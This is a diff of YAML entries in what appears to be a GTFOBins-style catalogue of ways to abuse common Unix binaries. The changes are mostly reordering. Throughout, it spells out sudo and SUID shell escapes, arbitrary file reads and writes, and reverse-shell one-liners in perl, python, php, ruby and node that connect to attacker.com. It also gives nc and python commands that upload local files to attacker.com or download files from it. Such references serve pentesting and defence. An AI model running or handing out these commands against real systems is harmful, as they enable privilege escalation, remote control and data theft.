- code: "./ld.so /bin/sh -p"
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo /lib/ld.so /bin/sh
|
- code: sudo /lib/ld.so /bin/sh
|
||||||
suid-enabled:
|
|
||||||
- code: ./ld.so /bin/sh -p
|
|
||||||
---
|
---
|
||||||
|
@ -7,6 +7,10 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
|
VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
|
||||||
v
|
v
|
||||||
|
file-read:
|
||||||
|
- code: 'less file_to_read
|
||||||
|
|
||||||
|
'
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: |
|
- code: |
|
||||||
sudo less /etc/profile
|
sudo less /etc/profile
|
||||||
@ -15,7 +19,4 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
./less /etc/profile
|
./less /etc/profile
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
file-read:
|
|
||||||
- code: |
|
|
||||||
less file_to_read
|
|
||||||
---
|
---
|
||||||
|
@ -8,17 +8,17 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
COMMAND='/bin/sh'
|
COMMAND='/bin/sh'
|
||||||
make -s --eval=$'x:\n\t-'"$COMMAND"
|
make -s --eval=$'x:\n\t-'"$COMMAND"
|
||||||
sudo-enabled:
|
|
||||||
- code: |
|
|
||||||
COMMAND='/bin/sh'
|
|
||||||
sudo make -s --eval=$'x:\n\t-'"$COMMAND"
|
|
||||||
suid-enabled:
|
|
||||||
- code: |
|
|
||||||
COMMAND='/bin/sh -p'
|
|
||||||
./make -s --eval=$'x:\n\t-'"$COMMAND"
|
|
||||||
file-write:
|
file-write:
|
||||||
- description: Requires a newer GNU `make` version.
|
- description: Requires a newer GNU `make` version.
|
||||||
code: |
|
code: |
|
||||||
LFILE=file_to_write
|
LFILE=file_to_write
|
||||||
make -s --eval="\$(file >$LFILE,data)" .
|
make -s --eval="\$(file >$LFILE,data)" .
|
||||||
|
suid-enabled:
|
||||||
|
- code: |
|
||||||
|
COMMAND='/bin/sh -p'
|
||||||
|
./make -s --eval=$'x:\n\t-'"$COMMAND"
|
||||||
|
sudo-enabled:
|
||||||
|
- code: |
|
||||||
|
COMMAND='/bin/sh'
|
||||||
|
sudo make -s --eval=$'x:\n\t-'"$COMMAND"
|
||||||
---
|
---
|
||||||
|
@ -4,6 +4,10 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
man man
|
man man
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
|
file-read:
|
||||||
|
- code: 'man file_to_read
|
||||||
|
|
||||||
|
'
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: |
|
- code: |
|
||||||
sudo man man
|
sudo man man
|
||||||
@ -12,7 +16,4 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
./man man
|
./man man
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
file-read:
|
|
||||||
- code: |
|
|
||||||
man file_to_read
|
|
||||||
---
|
---
|
||||||
|
@ -4,14 +4,14 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
TERM= more /etc/profile
|
TERM= more /etc/profile
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
|
file-read:
|
||||||
|
- code: 'more file_to_read
|
||||||
|
|
||||||
|
'
|
||||||
|
suid-enabled:
|
||||||
|
- code: "./more file_to_read\n"
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: |
|
- code: |
|
||||||
TERM= sudo -E more /etc/profile
|
TERM= sudo -E more /etc/profile
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
suid-enabled:
|
|
||||||
- code: |
|
|
||||||
./more file_to_read
|
|
||||||
file-read:
|
|
||||||
- code: |
|
|
||||||
more file_to_read
|
|
||||||
---
|
---
|
||||||
|
@ -9,15 +9,14 @@ functions:
|
|||||||
chmod +x $TF
|
chmod +x $TF
|
||||||
nano -s $TF /etc/hosts
|
nano -s $TF /etc/hosts
|
||||||
^T
|
^T
|
||||||
sudo-enabled:
|
file-write:
|
||||||
- description: After running this exit the editor to see the command output.
|
- code: |
|
||||||
code: |
|
nano file_to_write
|
||||||
COMMAND=id
|
^O
|
||||||
TF=$(mktemp)
|
file-read:
|
||||||
echo "$COMMAND" > $TF
|
- code: 'nano file_to_read
|
||||||
chmod +x $TF
|
|
||||||
sudo nano -s $TF /etc/hosts
|
'
|
||||||
^T
|
|
||||||
suid-enabled:
|
suid-enabled:
|
||||||
- description: After running this exit the editor to see the command output.
|
- description: After running this exit the editor to see the command output.
|
||||||
code: |
|
code: |
|
||||||
@ -27,11 +26,13 @@ functions:
|
|||||||
chmod +x $TF
|
chmod +x $TF
|
||||||
./nano -s $TF /etc/hosts
|
./nano -s $TF /etc/hosts
|
||||||
^T
|
^T
|
||||||
file-read:
|
sudo-enabled:
|
||||||
- code: |
|
- description: After running this exit the editor to see the command output.
|
||||||
nano file_to_read
|
code: |
|
||||||
file-write:
|
COMMAND=id
|
||||||
- code: |
|
TF=$(mktemp)
|
||||||
nano file_to_write
|
echo "$COMMAND" > $TF
|
||||||
^O
|
chmod +x $TF
|
||||||
|
sudo nano -s $TF /etc/hosts
|
||||||
|
^T
|
||||||
---
|
---
|
||||||
|
@ -1,18 +1,5 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
upload:
|
|
||||||
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
|
|
||||||
code: |
|
|
||||||
RHOST=attacker.com
|
|
||||||
RPORT=12345
|
|
||||||
LFILE=file_to_send
|
|
||||||
nc $RHOST $RPORT < "$LFILE"
|
|
||||||
download:
|
|
||||||
- description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
|
|
||||||
code: |
|
|
||||||
LPORT=12345
|
|
||||||
LFILE=file_to_save
|
|
||||||
nc -l -p $LPORT > "$LFILE"
|
|
||||||
reverse-shell-interactive:
|
reverse-shell-interactive:
|
||||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
@ -24,4 +11,19 @@ functions:
|
|||||||
code: |
|
code: |
|
||||||
LPORT=12345
|
LPORT=12345
|
||||||
nc -l -p $LPORT -e /bin/sh
|
nc -l -p $LPORT -e /bin/sh
|
||||||
|
upload:
|
||||||
|
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"`
|
||||||
|
on the attacker box to collect the file.
|
||||||
|
code: |
|
||||||
|
RHOST=attacker.com
|
||||||
|
RPORT=12345
|
||||||
|
LFILE=file_to_send
|
||||||
|
nc $RHOST $RPORT < "$LFILE"
|
||||||
|
download:
|
||||||
|
- description: Fetch remote file from a remote TCP port. Run `nc target.com 12345
|
||||||
|
< "file_to_send"` on the attacker box to send the file.
|
||||||
|
code: |
|
||||||
|
LPORT=12345
|
||||||
|
LFILE=file_to_save
|
||||||
|
nc -l -p $LPORT > "$LFILE"
|
||||||
---
|
---
|
||||||
|
@ -1,17 +1,19 @@
|
|||||||
---
|
---
|
||||||
description: |
|
description: 'The read file content is corrupted by a leading space added to each
|
||||||
The read file content is corrupted by a leading space added to each line.
|
line.
|
||||||
|
|
||||||
|
'
|
||||||
functions:
|
functions:
|
||||||
sudo-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
sudo nl -bn -w1 -s '' $LFILE
|
|
||||||
suid-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
./nl -bn -w1 -s '' $LFILE
|
|
||||||
file-read:
|
file-read:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
nl -bn -w1 -s '' $LFILE
|
nl -bn -w1 -s '' $LFILE
|
||||||
|
suid-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./nl -bn -w1 -s '' $LFILE
|
||||||
|
sudo-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
sudo nl -bn -w1 -s '' $LFILE
|
||||||
---
|
---
|
||||||
|
@ -1,14 +1,9 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: |
|
- code: 'node -e ''require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});''
|
||||||
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
|
||||||
sudo-enabled:
|
'
|
||||||
- code: |
|
|
||||||
sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
|
||||||
suid-enabled:
|
|
||||||
- code: |
|
|
||||||
./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
|
|
||||||
reverse-shell-interactive:
|
reverse-shell-interactive:
|
||||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
@ -30,4 +25,14 @@ functions:
|
|||||||
sh.stdout.pipe(client);
|
sh.stdout.pipe(client);
|
||||||
sh.stderr.pipe(client);
|
sh.stderr.pipe(client);
|
||||||
}).listen(process.env.LPORT);'
|
}).listen(process.env.LPORT);'
|
||||||
|
suid-enabled:
|
||||||
|
- code: './node -e ''require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0,
|
||||||
|
1, 2]});''
|
||||||
|
|
||||||
|
'
|
||||||
|
sudo-enabled:
|
||||||
|
- code: 'sudo node -e ''require("child_process").spawn("/bin/sh", {stdio: [0, 1,
|
||||||
|
2]});''
|
||||||
|
|
||||||
|
'
|
||||||
---
|
---
|
||||||
|
@ -3,16 +3,16 @@ description: |
|
|||||||
Three spaces are added before each character in the read file, and
|
Three spaces are added before each character in the read file, and
|
||||||
non-printable chars are printed as backslash escape sequences.
|
non-printable chars are printed as backslash escape sequences.
|
||||||
functions:
|
functions:
|
||||||
sudo-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
sudo od -An -c -w9999 "$LFILE"
|
|
||||||
suid-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
./od -An -c -w9999 "$LFILE"
|
|
||||||
file-read:
|
file-read:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
od -An -c -w9999 "$LFILE"
|
od -An -c -w9999 "$LFILE"
|
||||||
|
suid-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./od -An -c -w9999 "$LFILE"
|
||||||
|
sudo-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
sudo od -An -c -w9999 "$LFILE"
|
||||||
---
|
---
|
||||||
|
@ -2,14 +2,14 @@
|
|||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: perl -e 'exec "/bin/sh";'
|
- code: perl -e 'exec "/bin/sh";'
|
||||||
sudo-enabled:
|
|
||||||
- code: sudo perl -e 'exec "/bin/sh";'
|
|
||||||
suid-enabled:
|
|
||||||
- code: ./perl -e 'exec "/bin/sh";'
|
|
||||||
reverse-shell-interactive:
|
reverse-shell-interactive:
|
||||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||||||
|
suid-enabled:
|
||||||
|
- code: ./perl -e 'exec "/bin/sh";'
|
||||||
|
sudo-enabled:
|
||||||
|
- code: sudo perl -e 'exec "/bin/sh";'
|
||||||
---
|
---
|
||||||
|
@ -20,16 +20,15 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
export CMD="id"
|
export CMD="id"
|
||||||
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
|
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
|
||||||
sudo-enabled:
|
reverse-shell-interactive:
|
||||||
- code: |
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
CMD="/bin/sh"
|
code: |
|
||||||
sudo php -r "system('$CMD');"
|
export RHOST=attacker.com
|
||||||
suid-enabled:
|
export RPORT=12345
|
||||||
- code: |
|
php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
|
||||||
CMD="/bin/sh"
|
|
||||||
./php -r "system('$CMD');"
|
|
||||||
upload:
|
upload:
|
||||||
- description: Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later.
|
- description: Serve files in the local folder running an HTTP server. This requires
|
||||||
|
PHP version 5.4 or later.
|
||||||
code: |
|
code: |
|
||||||
LHOST=0.0.0.0
|
LHOST=0.0.0.0
|
||||||
LPORT=8888
|
LPORT=8888
|
||||||
@ -40,10 +39,12 @@ functions:
|
|||||||
export URL=http://attacker.com/file_to_get
|
export URL=http://attacker.com/file_to_get
|
||||||
export LFILE=file_to_save
|
export LFILE=file_to_save
|
||||||
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
|
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
|
||||||
reverse-shell-interactive:
|
suid-enabled:
|
||||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
- code: |
|
||||||
code: |
|
CMD="/bin/sh"
|
||||||
export RHOST=attacker.com
|
./php -r "system('$CMD');"
|
||||||
export RPORT=12345
|
sudo-enabled:
|
||||||
php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
|
- code: |
|
||||||
|
CMD="/bin/sh"
|
||||||
|
sudo php -r "system('$CMD');"
|
||||||
---
|
---
|
||||||
|
@ -9,15 +9,14 @@ functions:
|
|||||||
chmod +x $TF
|
chmod +x $TF
|
||||||
pico -s $TF /etc/hosts
|
pico -s $TF /etc/hosts
|
||||||
^T
|
^T
|
||||||
sudo-enabled:
|
file-write:
|
||||||
- description: After running this exit the editor to see the command output.
|
- code: |
|
||||||
code: |
|
pico file_to_write
|
||||||
COMMAND=id
|
^O
|
||||||
TF=$(mktemp)
|
file-read:
|
||||||
echo "$COMMAND" > $TF
|
- code: 'pico file_to_read
|
||||||
chmod +x $TF
|
|
||||||
sudo pico -s $TF /etc/hosts
|
'
|
||||||
^T
|
|
||||||
suid-enabled:
|
suid-enabled:
|
||||||
- description: After running this exit the editor to see the command output.
|
- description: After running this exit the editor to see the command output.
|
||||||
code: |
|
code: |
|
||||||
@ -27,11 +26,13 @@ functions:
|
|||||||
chmod +x $TF
|
chmod +x $TF
|
||||||
./pico -s $TF /etc/hosts
|
./pico -s $TF /etc/hosts
|
||||||
^T
|
^T
|
||||||
file-read:
|
sudo-enabled:
|
||||||
- code: |
|
- description: After running this exit the editor to see the command output.
|
||||||
pico file_to_read
|
code: |
|
||||||
file-write:
|
COMMAND=id
|
||||||
- code: |
|
TF=$(mktemp)
|
||||||
pico file_to_write
|
echo "$COMMAND" > $TF
|
||||||
^O
|
chmod +x $TF
|
||||||
|
sudo pico -s $TF /etc/hosts
|
||||||
|
^T
|
||||||
---
|
---
|
||||||
|
@ -5,19 +5,20 @@ functions:
|
|||||||
code: |
|
code: |
|
||||||
export CMD="/usr/bin/id"
|
export CMD="/usr/bin/id"
|
||||||
puppet apply -e "exec { '$CMD': logoutput => true }"
|
puppet apply -e "exec { '$CMD': logoutput => true }"
|
||||||
sudo-enabled:
|
|
||||||
- description: The executed command output shown in the puppet log format.
|
|
||||||
code: |
|
|
||||||
export CMD="/usr/bin/id"
|
|
||||||
sudo puppet apply -e "exec { '$CMD': logoutput => true }"
|
|
||||||
file-read:
|
|
||||||
- description: The read file content is corrupted by the `diff` output format. The actual `/usr/bin/diff` command is executed.
|
|
||||||
code: |
|
|
||||||
export LFILE=file_to_read
|
|
||||||
puppet filebucket -l diff /dev/null $LFILE
|
|
||||||
file-write:
|
file-write:
|
||||||
- description: The file path must be absolute.
|
- description: The file path must be absolute.
|
||||||
code: |
|
code: |
|
||||||
export LFILE="/tmp/file_to_write"
|
export LFILE="/tmp/file_to_write"
|
||||||
puppet apply -e "file { '$LFILE': content => 'data' }"
|
puppet apply -e "file { '$LFILE': content => 'data' }"
|
||||||
|
file-read:
|
||||||
|
- description: The read file content is corrupted by the `diff` output format. The
|
||||||
|
actual `/usr/bin/diff` command is executed.
|
||||||
|
code: |
|
||||||
|
export LFILE=file_to_read
|
||||||
|
puppet filebucket -l diff /dev/null $LFILE
|
||||||
|
sudo-enabled:
|
||||||
|
- description: The executed command output shown in the puppet log format.
|
||||||
|
code: |
|
||||||
|
export CMD="/usr/bin/id"
|
||||||
|
sudo puppet apply -e "exec { '$CMD': logoutput => true }"
|
||||||
---
|
---
|
||||||
|
@ -2,12 +2,16 @@
|
|||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: python2 -c 'import os; os.system("/bin/sh")'
|
- code: python2 -c 'import os; os.system("/bin/sh")'
|
||||||
sudo-enabled:
|
reverse-shell-interactive:
|
||||||
- code: sudo python2 -c 'import os; os.system("/bin/sh")'
|
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on
|
||||||
suid-enabled:
|
the attacker box to receive the shell.
|
||||||
- code: ./python2 -c 'import os; os.system("/bin/sh -p")'
|
code: |
|
||||||
|
export RHOST=attacker.com
|
||||||
|
export RPORT=12345
|
||||||
|
python2 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
|
||||||
upload:
|
upload:
|
||||||
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
- description: Send local file via "d" parameter of a HTTP POST request. Run an
|
||||||
|
HTTP service on the attacker box to collect the file.
|
||||||
code: |
|
code: |
|
||||||
export URL=http://attacker.com/
|
export URL=http://attacker.com/
|
||||||
export LFILE=file_to_send
|
export LFILE=file_to_send
|
||||||
@ -22,16 +26,14 @@ functions:
|
|||||||
export URL=http://attacker.com/file_to_get
|
export URL=http://attacker.com/file_to_get
|
||||||
export LFILE=file_to_save
|
export LFILE=file_to_save
|
||||||
python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
|
python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
|
||||||
reverse-shell-interactive:
|
|
||||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
|
||||||
code: |
|
|
||||||
export RHOST=attacker.com
|
|
||||||
export RPORT=12345
|
|
||||||
python2 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
|
|
||||||
file-read:
|
|
||||||
- code: python2 -c 'open("file_to_read").read()'
|
|
||||||
file-write:
|
file-write:
|
||||||
- code: python2 -c 'open("file_to_write","w+").write("data")'
|
- code: python2 -c 'open("file_to_write","w+").write("data")'
|
||||||
|
file-read:
|
||||||
|
- code: python2 -c 'open("file_to_read").read()'
|
||||||
load-library:
|
load-library:
|
||||||
- code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
|
- code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
|
||||||
|
suid-enabled:
|
||||||
|
- code: ./python2 -c 'import os; os.system("/bin/sh -p")'
|
||||||
|
sudo-enabled:
|
||||||
|
- code: sudo python2 -c 'import os; os.system("/bin/sh")'
|
||||||
---
|
---
|
||||||
|
@ -2,12 +2,16 @@
|
|||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: python3 -c 'import os; os.system("/bin/sh")'
|
- code: python3 -c 'import os; os.system("/bin/sh")'
|
||||||
sudo-enabled:
|
reverse-shell-interactive:
|
||||||
- code: sudo python3 -c 'import os; os.system("/bin/sh")'
|
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on
|
||||||
suid-enabled:
|
the attacker box to receive the shell.
|
||||||
- code: ./python3 -c 'import os; os.system("/bin/sh -p")'
|
code: |
|
||||||
|
export RHOST=attacker.com
|
||||||
|
export RPORT=12345
|
||||||
|
python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
|
||||||
upload:
|
upload:
|
||||||
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
- description: Send local file via "d" parameter of a HTTP POST request. Run an
|
||||||
|
HTTP service on the attacker box to collect the file.
|
||||||
code: |
|
code: |
|
||||||
export URL=http://attacker.com/
|
export URL=http://attacker.com/
|
||||||
export LFILE=file_to_send
|
export LFILE=file_to_send
|
||||||
@ -22,16 +26,14 @@ functions:
|
|||||||
export URL=http://attacker.com/file_to_get
|
export URL=http://attacker.com/file_to_get
|
||||||
export LFILE=file_to_save
|
export LFILE=file_to_save
|
||||||
python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
|
python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
|
||||||
reverse-shell-interactive:
|
|
||||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
|
||||||
code: |
|
|
||||||
export RHOST=attacker.com
|
|
||||||
export RPORT=12345
|
|
||||||
python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
|
|
||||||
file-read:
|
|
||||||
- code: python3 -c 'open("file_to_read").read()'
|
|
||||||
file-write:
|
file-write:
|
||||||
- code: python3 -c 'open("file_to_write","w+").write("data")'
|
- code: python3 -c 'open("file_to_write","w+").write("data")'
|
||||||
|
file-read:
|
||||||
|
- code: python3 -c 'open("file_to_read").read()'
|
||||||
load-library:
|
load-library:
|
||||||
- code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
|
- code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
|
||||||
|
suid-enabled:
|
||||||
|
- code: ./python3 -c 'import os; os.system("/bin/sh -p")'
|
||||||
|
sudo-enabled:
|
||||||
|
- code: sudo python3 -c 'import os; os.system("/bin/sh")'
|
||||||
---
|
---
|
||||||
|
@ -2,13 +2,14 @@
|
|||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: rlwrap /bin/sh
|
- code: rlwrap /bin/sh
|
||||||
sudo-enabled:
|
|
||||||
- code: sudo rlwrap /bin/sh
|
|
||||||
suid-enabled:
|
|
||||||
- code: ./rlwrap -H /dev/null /bin/sh -p
|
|
||||||
file-write:
|
file-write:
|
||||||
- description: This adds timestamps to the output file. This relies on the external `echo` command.
|
- description: This adds timestamps to the output file. This relies on the external
|
||||||
|
`echo` command.
|
||||||
code: |
|
code: |
|
||||||
LFILE=file_to_write
|
LFILE=file_to_write
|
||||||
rlwrap -l "$LFILE" echo data
|
rlwrap -l "$LFILE" echo data
|
||||||
|
suid-enabled:
|
||||||
|
- code: "./rlwrap -H /dev/null /bin/sh -p"
|
||||||
|
sudo-enabled:
|
||||||
|
- code: sudo rlwrap /bin/sh
|
||||||
---
|
---
|
||||||
|
@ -2,8 +2,8 @@
|
|||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
- code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
||||||
sudo-enabled:
|
|
||||||
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
|
||||||
suid-enabled:
|
suid-enabled:
|
||||||
- code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
|
- code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
|
||||||
|
sudo-enabled:
|
||||||
|
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
||||||
---
|
---
|
||||||
|
@ -2,8 +2,8 @@
|
|||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
- code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
||||||
sudo-enabled:
|
|
||||||
- code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
|
||||||
suid-enabled:
|
suid-enabled:
|
||||||
- code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
|
- code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
|
||||||
|
sudo-enabled:
|
||||||
|
- code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
||||||
---
|
---
|
||||||
|
@ -2,10 +2,15 @@
|
|||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: ruby -e 'exec "/bin/sh"'
|
- code: ruby -e 'exec "/bin/sh"'
|
||||||
sudo-enabled:
|
reverse-shell-interactive:
|
||||||
- code: sudo ruby -e 'exec "/bin/sh"'
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
|
code: |
|
||||||
|
export RHOST=attacker.com
|
||||||
|
export RPORT=12345
|
||||||
|
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
||||||
upload:
|
upload:
|
||||||
- description: Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later.
|
- description: Serve files in the local folder running an HTTP server. This requires
|
||||||
|
version 1.9.2 or later.
|
||||||
code: |
|
code: |
|
||||||
export LPORT=8888
|
export LPORT=8888
|
||||||
ruby -run -e httpd . -p $LPORT
|
ruby -run -e httpd . -p $LPORT
|
||||||
@ -17,16 +22,12 @@ functions:
|
|||||||
export RFILE=/file_to_get
|
export RFILE=/file_to_get
|
||||||
export LFILE=file_to_save
|
export LFILE=file_to_save
|
||||||
ruby -e 'require "net/http"; Net::HTTP.start(ENV["RHOST"], ENV["RPORT"]) { |http| r = http.get(ENV["RFILE"]); open(ENV["LFILE"], "wb") { |file| file.write(r.body) } }'
|
ruby -e 'require "net/http"; Net::HTTP.start(ENV["RHOST"], ENV["RPORT"]) { |http| r = http.get(ENV["RFILE"]); open(ENV["LFILE"], "wb") { |file| file.write(r.body) } }'
|
||||||
reverse-shell-interactive:
|
|
||||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
|
||||||
code: |
|
|
||||||
export RHOST=attacker.com
|
|
||||||
export RPORT=12345
|
|
||||||
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
|
||||||
file-read:
|
|
||||||
- code: ruby -e 'puts File.read("file_to_read")'
|
|
||||||
file-write:
|
file-write:
|
||||||
- code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("data") }'
|
- code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("data") }'
|
||||||
|
file-read:
|
||||||
|
- code: ruby -e 'puts File.read("file_to_read")'
|
||||||
load-library:
|
load-library:
|
||||||
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
|
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
|
||||||
|
sudo-enabled:
|
||||||
|
- code: sudo ruby -e 'exec "/bin/sh"'
|
||||||
---
|
---
|
||||||
|
@ -7,6 +7,18 @@ functions:
|
|||||||
echo "$CMD" > "$TF"
|
echo "$CMD" > "$TF"
|
||||||
chmod +x "$TF"
|
chmod +x "$TF"
|
||||||
scp -S $TF x y:
|
scp -S $TF x y:
|
||||||
|
upload:
|
||||||
|
